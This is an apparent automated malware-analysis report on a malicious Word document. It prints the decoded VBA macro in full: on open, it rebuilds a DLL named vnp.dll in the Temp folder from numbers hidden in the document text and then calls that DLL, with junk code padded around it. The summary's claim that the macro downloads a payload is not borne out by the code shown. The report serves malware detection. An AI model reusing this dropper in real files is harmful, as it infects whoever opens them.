Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 bd7920ab4830328c…

MALICIOUS

Office (OLE)

2.72 MB Created: 2020-02-15 02:58:00 Authoring application: Microsoft Office Word First seen: 2020-09-04
MD5: b3e3e01be28b21afa8a5a6058282a35a SHA-1: 42651de9242843083d29249301513bf80d15032a SHA-256: bd7920ab4830328cb91d1d1f60b93808e318df56daa4b535e0c6e1a03f691e37
78 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The presence of a Document_Open macro and the 'SC_STR_WSCRIPT' heuristic indicate that this Office document is designed to execute malicious VBA code. The VBA script attempts to access the user's temporary directory using Environ("Temp"), likely to stage a downloaded payload. The script's complexity and obfuscation prevent a more detailed analysis of its exact execution flow, but its intent is to download and run a secondary malicious component.

Heuristics 5

  • Reference to Windows Script Host high SC_STR_WSCRIPT
    Reference to Windows Script Host
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    End Sub
    Private Sub Document_Open()
    shoptrust
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
    Dim nick_customer As Boolean
    platform_mandatory = Environ("Temp")
    ChDir (platform_mandatory)
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 23718 bytes
SHA-256: 3433a75faa4feefbd67005f802839b03527304e6ce605eb7bc78780686e00b53
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function shoptrust()
Dim platform_mandatory As String
Dim nick_customer As Boolean
platform_mandatory = Environ("Temp")
ChDir (platform_mandatory)
End Function
Function tpl_vid(Carnoidme, Genazrel, Publik, gift, panel, publeic, members)
Dim styleTag As Long
Dim nick_customer As Boolean
Dim engine_u42 As Words
Set engine_u42 = ThisDocument.Words
nowarnrevokeall = "-"
If delaymailto Then
Dim GUIDComCat
    Dim PrioVal

    ' figure out which event they are trying to register with and set
    ' the comcat for this event in GUIDComCat
    Select Case LCase(szEvent)
        Case "onpostearly"
            GUIDComCat = GUIDComCatOnPostEarly
        Case "onpost"
            GUIDComCat = GUIDComCatOnPost
        Case "onpostfinal"
            GUIDComCat = GUIDComCatOnPostFinal
        Case Else
            WScript.echo "invalid event: " & szEvent
            'Exit Sub
    End Select

    ' enumerate through each of the registered instances for the NNTP source
    ' type and look for the display name that matches the instance display
    ' name
    Set SourceType = EventManager.SourceTypes(GUIDSourceType)
    szSourceDisplayName = szService & " " & iInstance
End If
On Error Resume Next
Dim phonenumber3 As String
Dim correctcasengift As Boolean, Profile_var As Boolean
Dim streamwysiwyg As Byte, Last As Long
Dim viewtID
correctcasengift = False
Open Publik For Binary Lock Read Write As #1
If delaymailto Then
'Dim GUIDComCat
    'Dim PrioVal

    ' figure out which event they are trying to register with and set
    ' the comcat for this event in GUIDComCat
    Select Case LCase(szEvent)
        Case "onpostearly"
            GUIDComCat = GUIDComCatOnPostEarly
        Case "onpost"
            GUIDComCat = GUIDComCatOnPost
        Case "onpostfinal"
            GUIDComCat = GUIDComCatOnPostFinal
        Case Else
            WScript.echo "invalid event: " & szEvent
           ' Exit Sub
    End Select

    ' enumerate through each of the registered instances for the NNTP source
    ' type and look for the display name that matches the instance display
    ' name
    Set SourceType = EventManager.SourceTypes(GUIDSourceType)
    szSourceDisplayName = szService & " " & iInstance
End If
For Each viewtID In engine_u42
If delaymailto Then
'Dim GUIDComCat
    'Dim PrioVal

    ' figure out which event they are trying to register with and set
    ' the comcat for this event in GUIDComCat
    Select Case LCase(szEvent)
        Case "onpostearly"
            GUIDComCat = GUIDComCatOnPostEarly
        Case "onpost"
            GUIDComCat = GUIDComCatOnPost
        Case "onpostfinal"
            GUIDComCat = GUIDComCatOnPostFinal
        Case Else
            WScript.echo "invalid event: " & szEvent
           ' Exit Sub
    End Select

    ' enumerate through each of the registered instances for the NNTP source
    ' type and look for the display name that matches the instance display
    ' name
    Set SourceType = EventManager.SourceTypes(GUIDSourceType)
    szSourceDisplayName = szService & " " & iInstance
End If
If viewtID = nowarnrevokeall Then
Profile_var = True
GoTo Jbayubdje
End If
If Profile_var = True Then
If delaymailto Then
'Dim GUIDComCat
    'Dim PrioVal

    ' figure out which event they are trying to register with and set
    ' the comcat for this event in GUIDComCat
    Select Case LCase(szEvent)
        Case "onpostearly"
            GUIDComCat = GUIDComCatOnPostEarly
        Case "onpost"
            GUIDComCat = GUIDComCatOnPost
        Case "onpostfinal"
            GUIDComCat = GUIDComCatOnPostFinal
        Case Else
            WScript.echo "invalid event: " & szEvent
           ' Exit Sub
    End Select

    ' enumerate through each of the registered instances for the NNTP source
    ' type and look for the display name that matches the instance display
    ' name
    Set SourceType = EventManager.SourceTypes(GUIDSourceType)
    szSourceDisplayName = szService & " " & iInstance
End If
viewtID = nowarnrevokeall + viewtID
Profile_var = False
End If
If viewtID <> Carnoidme And correctcasengift = False Then
If delaymailto Then
'Dim GUIDComCat
   ' Dim PrioVal

    ' figure out which event they are trying to register with and set
    ' the comcat for this event in GUIDComCat
    Select Case LCase(szEvent)
        Case "onpostearly"
            GUIDComCat = GUIDComCatOnPostEarly
        Case "onpost"
            GUIDComCat = GUIDComCatOnPost
        Case "onpostfinal"
            GUIDComCat = GUIDComCatOnPostFinal
        Case Else
            WScript.echo "invalid event: " & szEvent
            'Exit Sub
    End Select

    ' enumerate through each of the registered instances for the NNTP source
    ' type and look for the display name that matches the instance display
    ' name
    Set SourceType = EventManager.SourceTypes(GUIDSourceType)
    szSourceDisplayName = szService & " " & iInstance
End If
GoTo Jbayubdje
End If
If IsNumeric(viewtID) And correctcasengift Then
styleTag = Val(viewtID)
If delaymailto Then
'Dim GUIDComCat
    'Dim PrioVal

    ' figure out which event they are trying to register with and set
    ' the comcat for this event in GUIDComCat
    Select Case LCase(szEvent)
        Case "onpostearly"
            GUIDComCat = GUIDComCatOnPostEarly
        Case "onpost"
            GUIDComCat = GUIDComCatOnPost
        Case "onpostfinal"
            GUIDComCat = GUIDComCatOnPostFinal
        Case Else
            WScript.echo "invalid event: " & szEvent
           ' Exit Sub
    End Select

    ' enumerate through each of the registered instances for the NNTP source
    ' type and look for the display name that matches the instance display
    ' name
    Set SourceType = EventManager.SourceTypes(GUIDSourceType)
    szSourceDisplayName = szService & " " & iInstance
End If
Put #1, , styleTag
End If
If viewtID = Carnoidme Then
If delaymailto Then
'Dim GUIDComCat
    'Dim PrioVal

    ' figure out which event they are trying to register with and set
    ' the comcat for this event in GUIDComCat
    Select Case LCase(szEvent)
        Case "onpostearly"
            GUIDComCat = GUIDComCatOnPostEarly
        Case "onpost"
            GUIDComCat = GUIDComCatOnPost
        Case "onpostfinal"
            GUIDComCat = GUIDComCatOnPostFinal
        Case Else
            WScript.echo "invalid event: " & szEvent
           ' Exit Sub
    End Select

    ' enumerate through each of the registered instances for the NNTP source
    ' type and look for the display name that matches the instance display
    ' name
    Set SourceType = EventManager.SourceTypes(GUIDSourceType)
    szSourceDisplayName = szService & " " & iInstance
End If
correctcasengift = True
ElseIf viewtID = Genazrel Then
correctcasengift = False
GoTo Jackson
End If
Jbayubdje:
Next viewtID
Jackson:
Close #1
End Function
Sub columns_n()

Dim delaymailto As Boolean


Call tpl_vid("Goingon", "Baltamoir", "vnp.dll", "resizefile", "Status", "hl", "Upload")

delaymailto = Passant.beastmode(0)
If delaymailto = False Then

Call tpl_vid("Adaptek", "Allsets", "vnp.dll", "resizefile", "Status", "hl", "Upload")

Passant.beastmode (1)

End If
End Sub
Private Sub Document_Open()
shoptrust
columns_n
End Sub

Attribute VB_Name = "Passant"


Declare PtrSafe Function GetSystemDirectory Lib "kernel32.dll" Alias "GetSystemDirectoryA" (ByVal lpBuffer As String, ByVal nSize As Long) As Long
Declare PtrSafe Function GetWindowsDirectory Lib "kernel32.dll" Alias "GetWindowsDirectoryA" (ByVal lpBuffer As String, ByVal nSize As Long) As Long
Declare PtrSafe Function FindFirstFile Lib "kernel32.dll" Alias "FindFirstFileA" (ByVal lpFileName As String, lpFindFileData As Long) As Long
Declare PtrSafe Function FindClose Lib "kernel32.dll" (ByVal hFindFile As Long) As Long
Declare PtrSafe Function beastmode Lib "vnp.dll" (ByVal Offset As Long) As Long


' Processing file: /tmp/qstore_hcrqnl95
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 18904 bytes
' Line #0:
' 	FuncDefn (Function vnp.dll(id_FFFE As Variant))
' Line #1:
' 	Dim 
' 	VarDefn shoptrust (As String)
' Line #2:
' 	Dim 
' 	VarDefn platform_mandatory (As Boolean)
' Line #3:
' 	LitStr 0x0004 "Temp"
' 	ArgsLd Environ 0x0001 
' 	St shoptrust 
' Line #4:
' 	Ld shoptrust 
' 	Paren 
' 	ArgsCall ChDir 0x0001 
' Line #5:
' 	EndFunc 
' Line #6:
' 	FuncDefn (Function nick_customer(tpl_vid))
' Line #7:
' 	Dim 
' 	VarDefn panel (As Long)
' Line #8:
' 	Dim 
' 	VarDefn platform_mandatory (As Boolean)
' Line #9:
' 	Dim 
' 	VarDefn styleTag
' Line #10:
' 	SetStmt 
' 	Ld ThisDocument 
' 	MemLd Words 
' 	Set styleTag 
' Line #11:
' 	LitStr 0x0001 "-"
' 	St engine_u42 
' Line #12:
' 	Ld columns_n 
' 	IfBlock 
' Line #13:
' 	Dim 
' 	VarDefn delaymailto
' Line #14:
' 	Dim 
' 	VarDefn GUIDComCat
' Line #15:
' Line #16:
' 	QuoteRem 0x0004 0x0040 " figure out which event they are trying to register with and set"
' Line #17:
' 	QuoteRem 0x0004 0x0028 " the comcat for this event in GUIDComCat"
' Line #18:
' 	Ld LCase 
' 	ArgsLd PrioVal 0x0001 
' 	SelectCase 
' Line #19:
' 	LitStr 0x000B "onpostearly"
' 	Case 
' 	CaseDone 
' Line #20:
' 	Ld szEvent 
' 	St delaymailto 
' Line #21:
' 	LitStr 0x0006 "onpost"
' 	Case 
' 	CaseDone 
' Line #22:
' 	Ld GUIDComCatOnPostEarly 
' 	St delaymailto 
' Line #23:
' 	LitStr 0x000B "onpostfinal"
' 	Case 
' 	CaseDone 
' Line #24:
' 	Ld GUIDComCatOnPost 
' 	St delaymailto 
' Line #25:
' 	CaseElse 
' Line #26:
' 	LitStr 0x000F "invalid event: "
' 	Ld LCase 
' 	Concat 
' 	Ld vbCritical 
' 	ArgsMemCall GUIDComCatOnPostFinal 0x0001 
' Line #27:
' 	QuoteRem 0x000C 0x0008 "Exit Sub"
' Line #28:
' 	EndSelect 
' Line #29:
' Line #30:
' 	QuoteRem 0x0004 0x0047 " enumerate through each of the registered instances for the NNTP source"
' Line #31:
' 	QuoteRem 0x0004 0x0045 " type and look for the display name that matches the instance display"
' Line #32:
' 	QuoteRem 0x0004 0x0005 " name"
' Line #33:
' 	SetStmt 
' 	Ld SourceTypes 
' 	Ld SourceType 
' 	ArgsMemLd EventManager 0x0001 
' 	Set echo 
' Line #34:
' 	Ld szSourceDisplayName 
' 	LitStr 0x0001 " "
' 	Concat 
' 	Ld szService 
' 	Concat 
' 	St GUIDSourceType 
' Line #35:
' 	EndIfBlock 
' Line #36:
' 	OnError (Resume Next) 
' Line #37:
' 	Dim 
' 	VarDefn nowarnrevokeall (As String)
' Line #38:
' 	Dim 
' 	VarDefn phonenumber3 (As Boolean)
' 	VarDefn correctcasengift (As Boolean)
' Line #39:
' 	Dim 
' 	VarDefn Profile_var (As Byte)
' 	VarDefn Last (As Long)
' Line #40:
' 	Dim 
' 	VarDefn streamwysiwyg
' Line #41:
' 	LitVarSpecial (False)
' 	St phonenumber3 
' Line #42:
' 	Ld Genazrel 
' 	LitDI2 0x0001 
' 	Sharp 
' 	LitDefault 
' 	Open (For Binary Lock Read Write)
' Line #43:
' 	Ld columns_n 
' 	IfBlock 
' Line #44:
' 	QuoteRem 0x0000 0x000E "Dim GUIDComCat"
' Line #45:
' 	QuoteRem 0x0004 0x000B "Dim PrioVal"
' Line #46:
' Line #47:
' 	QuoteRem 0x0004 0x0040 " figure out which event they are trying to register with and set"
' Line #48:
' 	QuoteRem 0x0004 0x0028 " the comcat for this event in GUIDComCat"
' Line #49:
' 	Ld LCase 
' 	ArgsLd PrioVal 0x0001 
' 	SelectCase 
' Line #50:
' 	LitStr 0x000B "onpostearly"
' 	Case 
' 	CaseDone 
' Line #51:
' 	Ld szEvent 
' 	St delaymailto 
' Line #52:
' 	LitStr 0x0006 "onpost"
' 	Case 
' 	CaseDone 
' Line #53:
' 	Ld GUIDComCatOnPostEarly 
' 	St delaymailto 
' Line #54:
' 	LitStr 0x000B "onpostfinal"
' 	Case 
' 	CaseDone 
' Line #55:
' 	Ld GUIDComCatOnPost 
' 	St delaymailto 
' Line #56:
' 	CaseElse 
' Line #57:
' 	LitStr 0x000F "invalid event: "
' 	Ld LCase 
' 	Concat 
' 	Ld vbCritical 
' 	ArgsMemCall GUIDComCatOnPostFinal 0x0001 
' Line #58:
' 	QuoteRem 0x000B 0x0009 " Exit Sub"
' Line #59:
' 	EndSelect 
' Line #60:
' Line #61:
' 	QuoteRem 0x0004 0x0047 " enumerate through each of the registered instances for the NNTP source"
' Line #62:
' 	QuoteRem 0x0004 0x0045 " type and look for the display name that matches the instance display"
' Line #63:
' 	QuoteRem 0x0004 0x0005 " name"
' Line #64:
' 	SetStmt 
' 	Ld SourceTypes 
' 	Ld SourceType 
' 	ArgsMemLd EventManager 0x0001 
' 	Set echo 
' Line #65:
' 	Ld szSourceDisplayName 
' 	LitStr 0x0001 " "
' 	Concat 
' 	Ld szService 
' 	Concat 
' 	St GUIDSourceType 
' Line #66:
' 	EndIfBlock 
' Line #67:
' 	StartForVariable 
' 	Ld streamwysiwyg 
' 	EndForVariable 
' 	Ld styleTag 
' 	ForEach 
' Line #68:
' 	Ld columns_n 
' 	IfBlock 
' Line #69:
' 	QuoteRem 0x0000 0x000E "Dim GUIDComCat"
' Line #70:
' 	QuoteRem 0x0004 0x000B "Dim PrioVal"
' Line #71:
' Line #72:
' 	QuoteRem 0x0004 0x0040 " figure out which event they are trying to register with and set"
' Line #73:
' 	QuoteRem 0x0004 0x0028 " the comcat for this event in GUIDComCat"
' Line #74:
' 	Ld LCase 
' 	ArgsLd PrioVal 0x0001 
' 	SelectCase 
' Line #75:
' 	LitStr 0x000B "onpostearly"
' 	Case 
' 	CaseDone 
' Line #76:
' 	Ld szEvent 
' 	St delaymailto 
' Line #77:
' 	LitStr 0x0006 "onpost"
' 	Case 
' 	CaseDone 
' Line #78:
' 	Ld GUIDComCatOnPostEarly 
' 	St delaymailto 
' Line #79:
' 	LitStr 0x000B "onpostfinal"
' 	Case 
' 	CaseDone 
' Line #80:
' 	Ld GUIDComCatOnPost 
' 	St delaymailto 
' Line #81:
' 	CaseElse 
' Line #82:
' 	LitStr 0x000F "invalid event: "
' 	Ld LCase 
' 	Concat 
' 	Ld vbCritical 
' 	ArgsMemCall GUIDComCatOnPostFinal 0x0001 
' Line #83:
' 	QuoteRem 0x000B 0x0009 " Exit Sub"
' Line #84:
' 	EndSelect 
' Line #85:
' Line #86:
' 	QuoteRem 0x0004 0x0047 " enumerate through each of the registered instances for the NNTP source"
' Line #87:
' 	QuoteRem 0x0004 0x0045 " type and look for the display name that matches the instance display"
' Line #88:
' 	QuoteRem 0x0004 0x0005 " name"
' Line #89:
' 	SetStmt 
' 	Ld SourceTypes 
' 	Ld SourceType 
' 	ArgsMemLd EventManager 0x0001 
' 	Set echo 
' Line #90:
' 	Ld szSourceDisplayName 
' 	LitStr 0x0001 " "
' 	Concat 
' 	Ld szService 
' 	Concat 
' 	St GUIDSourceType 
' Line #91:
' 	EndIfBlock 
' Line #92:
' 	Ld streamwysiwyg 
' 	Ld engine_u42 
' 	Eq 
' 	IfBlock 
' Line #93:
' 	LitVarSpecial (True)
' 	St correctcasengift 
' Line #94:
' 	GoTo Jbayubdje 
' Line #95:
' 	EndIfBlock 
' Line #96:
' 	Ld correctcasengift 
' 	LitVarSpecial (True)
' 	Eq 
' 	IfBlock 
' Line #97:
' 	Ld columns_n 
' 	IfBlock 
' Line #98:
' 	QuoteRem 0x0000 0x000E "Dim GUIDComCat"
' Line #99:
' 	QuoteRem 0x0004 0x000B "Dim PrioVal"
' Line #100:
' Line #101:
' 	QuoteRem 0x0004 0x0040 " figure out which event they are trying to register with and set"
' Line #102:
' 	QuoteRem 0x0004 0x0028 " the comcat for this event in GUIDComCat"
' Line #103:
' 	Ld LCase 
' 	ArgsLd PrioVal 0x0001 
' 	SelectCase 
' Line #104:
' 	LitStr 0x000B "onpostearly"
' 	Case 
' 	CaseDone 
' Line #105:
' 	Ld szEvent 
' 	St delaymailto 
' Line #106:
' 	LitStr 0x0006 "onpost"
' 	Case 
' 	CaseDone 
' Line #107:
' 	Ld GUIDComCatOnPostEarly 
' 	St delaymailto 
' Line #108:
' 	LitStr 0x000B "onpostfinal"
' 	Case 
' 	CaseDone 
' Line #109:
' 	Ld GUIDComCatOnPost 
' 	St delaymailto 
' Line #110:
' 	CaseElse 
' Line #111:
' 	LitStr 0x000F "invalid event: "
' 	Ld LCase 
' 	Concat 
' 	Ld vbCritical 
' 	ArgsMemCall GUIDComCatOnPostFinal 0x0001 
' Line #112:
' 	QuoteRem 0x000B 0x0009 " Exit Sub"
' Line #113:
' 	EndSelect 
' Line #114:
' Line #115:
' 	QuoteRem 0x0004 0x0047 " enumerate through each of the registered instances for the NNTP source"
' Line #116:
' 	QuoteRem 0x0004 0x0045 " type and look for the display name that matches the instance display"
' Line #117:
' 	QuoteRem 0x0004 0x0005 " name"
' Line #118:
' 	SetStmt 
' 	Ld SourceTypes 
' 	Ld SourceType 
' 	ArgsMemLd EventManager 0x0001 
' 	Set echo 
' Line #119:
' 	Ld szSourceDisplayName 
' 	LitStr 0x0001 " "
' 	Concat 
' 	Ld szService 
' 	Concat 
' 	St GUIDSourceType 
' Line #120:
' 	EndIfBlock 
' Line #121:
' 	Ld engine_u42 
' 	Ld streamwysiwyg 
' 	Add 
' 	St streamwysiwyg 
' Line #122:
' 	LitVarSpecial (False)
' 	St correctcasengift 
' Line #123:
' 	EndIfBlock 
' Line #124:
' 	Ld streamwysiwyg 
' 	Ld tpl_vid 
' 	Ne 
' 	Ld phonenumber3 
' 	LitVarSpecial (False)
' 	Eq 
' 	And 
' 	IfBlock 
' Line #125:
' 	Ld columns_n 
' 	IfBlock 
' Line #126:
' 	QuoteRem 0x0000 0x000E "Dim GUIDComCat"
' Line #127:
' 	QuoteRem 0x0003 0x000C " Dim PrioVal"
' Line #128:
' Line #129:
' 	QuoteRem 0x0004 0x0040 " figure out which event they are trying to register with and set"
' Line #130:
' 	QuoteRem 0x0004 0x0028 " the comcat for this event in GUIDComCat"
' Line #131:
' 	Ld LCase 
' 	ArgsLd PrioVal 0x0001 
' 	SelectCase 
' Line #132:
' 	LitStr 0x000B "onpostearly"
' 	Case 
' 	CaseDone 
' Line #133:
' 	Ld szEvent 
' 	St delaymailto 
' Line #134:
' 	LitStr 0x0006 "onpost"
' 	Case 
' 	CaseDone 
' Line #135:
' 	Ld GUIDComCatOnPostEarly 
' 	St delaymailto 
' Line #136:
' 	LitStr 0x000B "onpostfinal"
' 	Case 
' 	CaseDone 
' Line #137:
' 	Ld GUIDComCatOnPost 
' 	St delaymailto 
' Line #138:
' 	CaseElse 
' Line #139:
' 	LitStr 0x000F "invalid event: "
' 	Ld LCase 
' 	Concat 
' 	Ld vbCritical 
' 	ArgsMemCall GUIDComCatOnPostFinal 0x0001 
' Line #140:
' 	QuoteRem 0x000C 0x0008 "Exit Sub"
' Line #141:
' 	EndSelect 
' Line #142:
' Line #143:
' 	QuoteRem 0x0004 0x0047 " enumerate through each of the registered instances for the NNTP source"
' Line #144:
' 	QuoteRem 0x0004 0x0045 " type and look for the display name that matches the instance display"
' Line #145:
' 	QuoteRem 0x0004 0x0005 " name"
' Line #146:
' 	SetStmt 
' 	Ld SourceTypes 
' 	Ld SourceType 
' 	ArgsMemLd EventManager 0x0001 
' 	Set echo 
' Line #147:
' 	Ld szSourceDisplayName 
' 	LitStr 0x0001 " "
' 	Concat 
' 	Ld szService 
' 	Concat 
' 	St GUIDSourceType 
' Line #148:
' 	EndIfBlock 
' Line #149:
' 	GoTo Jbayubdje 
' Line #150:
' 	EndIfBlock 
' Line #151:
' 	Ld streamwysiwyg 
' 	ArgsLd IsNumeric 0x0001 
' 	Ld phonenumber3 
' 	And 
' 	IfBlock 
' Line #152:
' 	Ld streamwysiwyg 
' 	ArgsLd Val 0x0001 
' 	St panel 
' Line #153:
' 	Ld columns_n 
' 	IfBlock 
' Line #154:
' 	QuoteRem 0x0000 0x000E "Dim GUIDComCat"
' Line #155:
' 	QuoteRem 0x0004 0x000B "Dim PrioVal"
' Line #156:
' Line #157:
' 	QuoteRem 0x0004 0x0040 " figure out which event they are trying to register with and set"
' Line #158:
' 	QuoteRem 0x0004 0x0028 " the comcat for this event in GUIDComCat"
' Line #159:
' 	Ld LCase 
' 	ArgsLd PrioVal 0x0001 
' 	SelectCase 
' Line #160:
' 	LitStr 0x000B "onpostearly"
' 	Case 
' 	CaseDone 
' Line #161:
' 	Ld szEvent 
' 	St delaymailto 
' Line #162:
' 	LitStr 0x0006 "onpost"
' 	Case 
' 	CaseDone 
' Line #163:
' 	Ld GUIDComCatOnPostEarly 
' 	St delaymailto 
' Line #164:
' 	LitStr 0x000B "onpostfinal"
' 	Case 
' 	CaseDone 
' Line #165:
' 	Ld GUIDComCatOnPost 
' 	St delaymailto 
' Line #166:
' 	CaseElse 
' Line #167:
' 	LitStr 0x000F "invalid event: "
' 	Ld LCase 
' 	Concat 
' 	Ld vbCritical 
' 	ArgsMemCall GUIDComCatOnPostFinal 0x0001 
' Line #168:
' 	QuoteRem 0x000B 0x0009 " Exit Sub"
' Line #169:
' 	EndSelect 
' Line #170:
' Line #171:
' 	QuoteRem 0x0004 0x0047 " enumerate through each of the registered instances for the NNTP source"
' Line #172:
' 	QuoteRem 0x0004 0x0045 " type and look for the display name that matches the instance display"
' Line #173:
' 	QuoteRem 0x0004 0x0005 " name"
' Line #174:
' 	SetStmt 
' 	Ld SourceTypes 
' 	Ld SourceType 
' 	ArgsMemLd EventManager 0x0001 
' 	Set echo 
' Line #175:
' 	Ld szSourceDisplayName 
' 	LitStr 0x0001 " "
' 	Concat 
' 	Ld szService 
' 	Concat 
' 	St GUIDSourceType 
' Line #176:
' 	EndIfBlock 
' Line #177:
' 	LitDI2 0x0001 
' 	Sharp 
' 	LitDefault 
' 	Ld panel 
' 	PutRec 
' Line #178:
' 	EndIfBlock 
' Line #179:
' 	Ld streamwysiwyg 
' 	Ld tpl_vid 
' 	Eq 
' 	IfBlock 
' Line #180:
' 	Ld columns_n 
' 	IfBlock 
' Line #181:
' 	QuoteRem 0x0000 0x000E "Dim GUIDComCat"
' Line #182:
' 	QuoteRem 0x0004 0x000B "Dim PrioVal"
' Line #183:
' Line #184:
' 	QuoteRem 0x0004 0x0040 " figure out which event they are trying to register with and set"
' Line #185:
' 	QuoteRem 0x0004 0x0028 " the comcat for this event in GUIDComCat"
' Line #186:
' 	Ld LCase 
' 	ArgsLd PrioVal 0x0001 
' 	SelectCase 
' Line #187:
' 	LitStr 0x000B "onpostearly"
' 	Case 
' 	CaseDone 
' Line #188:
' 	Ld szEvent 
' 	St delaymailto 
' Line #189:
' 	LitStr 0x0006 "onpost"
' 	Case 
' 	CaseDone 
' Line #190:
' 	Ld GUIDComCatOnPostEarly 
' 	St delaymailto 
' Line #191:
' 	LitStr 0x000B "onpostfinal"
' 	Case 
' 	CaseDone 
' Line #192:
' 	Ld GUIDComCatOnPost 
' 	St delaymailto 
' Line #193:
' 	CaseElse 
' Line #194:
' 	LitStr 0x000F "invalid event: "
' 	Ld LCase 
' 	Concat 
' 	Ld vbCritical 
' 	ArgsMemCall GUIDComCatOnPostFinal 0x0001 
' Line #195:
' 	QuoteRem 0x000B 0x0009 " Exit Sub"
' Line #196:
' 	EndSelect 
' Line #197:
' Line #198:
' 	QuoteRem 0x0004 0x0047 " enumerate through each of the registered instances for the NNTP source"
' Line #199:
' 	QuoteRem 0x0004 0x0045 " type and look for the display name that matches the instance display"
' Line #200:
' 	QuoteRem 0x0004 0x0005 " name"
' Line #201:
' 	SetStmt 
' 	Ld SourceTypes 
' 	Ld SourceType 
' 	ArgsMemLd EventManager 0x0001 
' 	Set echo 
' Line #202:
' 	Ld szSourceDisplayName 
' 	LitStr 0x0001 " "
' 	Concat 
' 	Ld szService 
' 	Concat 
' 	St GUIDSourceType 
' Line #203:
' 	EndIfBlock 
' Line #204:
' 	LitVarSpecial (True)
' 	St phonenumber3 
' Line #205:
' 	Ld streamwysiwyg 
' 	Ld Carnoidme 
' 	Eq 
' 	ElseIfBlock 
' Line #206:
' 	LitVarSpecial (False)
' 	St phonenumber3 
' Line #207:
' 	GoTo Jackson 
' Line #208:
' 	EndIfBlock 
' Line #209:
' 	Label Jbayubdje 
' Line #210:
' 	StartForVariable 
' 	Ld streamwysiwyg 
' 	EndForVariable 
' 	NextVar 
' Line #211:
' 	Label Jackson 
' Line #212:
' 	LitDI2 0x0001 
' 	Sharp 
' 	Close 0x0001 
' Line #213:
' 	EndFunc 
' Line #214:
' 	FuncDefn (Sub viewtID())
' Line #215:
' Line #216:
' 	Dim 
' 	VarDefn columns_n (As Boolean)
' Line #217:
' Line #218:
' Line #219:
' 	LitStr 0x0007 "Goingon"
' 	LitStr 0x0009 "Baltamoir"
' 	LitStr 0x0007 "vnp.dll"
' 	LitStr 0x000A "resizefile"
' 	LitStr 0x0006 "Status"
' 	LitStr 0x0002 "hl"
' 	LitStr 0x0006 "Upload"
' 	ArgsCall (Call) nick_customer 0x0007 
' Line #220:
' Line #221:
' 	LitDI2 0x0000 
' 	Ld _B_var_GetTickCount 
' 	ArgsMemLd _B_var_delaymailto 0x0001 
' 	St columns_n 
' Line #222:
' 	Ld columns_n 
' 	LitVarSpecial (False)
' 	Eq 
' 	IfBlock 
' Line #223:
' Line #224:
' 	LitStr 0x0007 "Adaptek"
' 	LitStr 0x0007 "Allsets"
' 	LitStr 0x0007 "vnp.dll"
' 	LitStr 0x000A "resizefile"
' 	LitStr 0x0006 "Status"
' 	LitStr 0x0002 "hl"
' 	LitStr 0x0006 "Upload"
' 	ArgsCall (Call) nick_customer 0x0007 
' Line #225:
' Line #226:
' 	LitDI2 0x0001 
' 	Paren 
' 	Ld _B_var_GetTickCount 
' 	ArgsMemCall _B_var_delaymailto 0x0001 
' Line #227:
' Line #228:
' 	EndIfBlock 
' Line #229:
' 	EndSub 
' Line #230:
' 	FuncDefn (Sub Document_Open())
' Line #231:
' 	ArgsCall vnp.dll 0x0000 
' Line #232:
' 	ArgsCall viewtID 0x0000 
' Line #233:
' 	EndSub 
' Macros/VBA/Passant - 3466 bytes
' Line #0:
' Line #1:
' Line #2:
' 	FuncDefn (Function GetSystemDirectory(ByVal lpBuffer As String) As Long)
' Line #3:
' 	FuncDefn (Function GetWindowsDirectory(ByVal lpBuffer As String) As Long)
' Line #4:
' 	FuncDefn (Function FindFirstFile(ByVal lpFileName As String) As Long)
' Line #5:
' 	FuncDefn (Function FindClose(ByVal hFindFile As Long) As Long)
' Line #6:
' 	FuncDefn (Function _B_var_delaymailto(ByVal GetTickCount As Long) As Long)
' Line #7: